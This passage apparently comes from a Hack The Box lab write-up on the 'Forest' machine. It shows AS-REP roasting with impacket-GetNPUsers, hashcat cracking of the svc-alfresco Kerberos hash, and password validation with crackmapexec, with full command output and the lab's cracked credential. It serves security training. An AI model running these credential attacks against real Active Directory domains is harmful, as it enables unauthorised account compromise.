ASREPRoasting
I was able to extract domain users from multiple difference sources including Kerberos, SMB, and LDAP
Those domain users were then put into a list
impacket-GetNPUsers
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ impacket-GetNPUsers htb.local/ -dc-ip $IP -usersfile users
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:fe6842a7423d169a93a1cc28dd6c7563$6cdc4d2d17399026706013c7a1c8db0e403d32005c6f9dc24ec4c33f9878756baf62a7c0324f5edfee73a74721578aa26297c107a92713b6e517eed2307fad0c9362573ead4e4ddee5c4446a04bb1d3f481a91cc075a09781423ae16a99ec8b5517af86b1a6041f199c55d3eef99a334ab02a7c8bb223fbc465d9b1365136c6395dd3716eb137e1fa4d8f3c06af1c033c9276b8b7121305fae9a45e0aa1165f26235203bc347f0985a58756b63ad83bbcf0b261b905b41246590602a86c1de97532f6a9723356ea6cdc5e0dce1a19aec7eb6477d9061d01a44fbcd28bce7cf033047163fad5b
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH setThe service account, svc-alfresco has the UF_DONT_REQUIRE_PREAUTH bit set
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ hashcat -a 0 -m 18200 svc-alfresco.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
$krb5asrep$23$svc-alfresco@htb.local:fe6842a7423d169a93a1cc28dd6c7563$6cdc4d2d17399026706013c7a1c8db0e403d32005c6f9dc24ec4c33f9878756baf62a7c0324f5edfee73a74721578aa26297c107a92713b6e517eed2307fad0c9362573ead4e4ddee5c4446a04bb1d3f481a91cc075a09781423ae16a99ec8b5517af86b1a6041f199c55d3eef99a334ab02a7c8bb223fbc465d9b1365136c6395dd3716eb137e1fa4d8f3c06af1c033c9276b8b7121305fae9a45e0aa1165f26235203bc347f0985a58756b63ad83bbcf0b261b905b41246590602a86c1de97532f6a9723356ea6cdc5e0dce1a19aec7eb6477d9061d01a44fbcd28bce7cf033047163fad5b:s3rvice
session..........: hashcat
status...........: Cracked
hash.mode........: 18200 (Kerberos 5, etype 23, AS-REP)
hash.target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:fe6842a7423d16...3fad5b
time.started.....: Sun Jan 22 14:22:03 2023 (4 secs)
time.estimated...: Sun Jan 22 14:22:07 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........: 983.4 kH/s (0.41ms) @ Accel:256 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 4085760/14344385 (28.48%)
rejected.........: 0/4085760 (0.00%)
restore.point....: 4084992/14344385 (28.48%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: s4299047 -> s3r3ndipit
hardware.mon.#1..: Util: 70%
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => started: Sun Jan 22 14:21:46 2023
stopped: Sun Jan 22 14:22:08 2023Hashcat crack the password hash for the svc-alfresco user
The cracked password is s3rvice
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ crackmapexec ldap $IP -u users -p 's3rvice' --continue-on-success
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [-] htb.local\administrator:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\krbtgt:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\$331000-VK4ADACQNUCA:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\sebastien:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\lucinda:s3rvice
LDAP 10.10.10.161 389 FOREST [+] htb.local\svc-alfresco:s3rvice
LDAP 10.10.10.161 389 FOREST [-] htb.local\andy:s3rvice
LDAP 10.10.10.161 389 FOREST [-] htb.local\mark:s3rvice
LDAP 10.10.10.161 389 FOREST [-] htb.local\santi:s3rvice
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ crackmapexec smb $IP -u users -p 's3rvice' --continue-on-success
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [-] htb.local\administrator:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\krbtgt:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\$331000-VK4ADACQNUCA:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\sebastien:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\lucinda:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\andy:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\mark:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\santi:s3rvice STATUS_LOGON_FAILURE Credential validated.
htb.local\svc-alfresco:s3rvice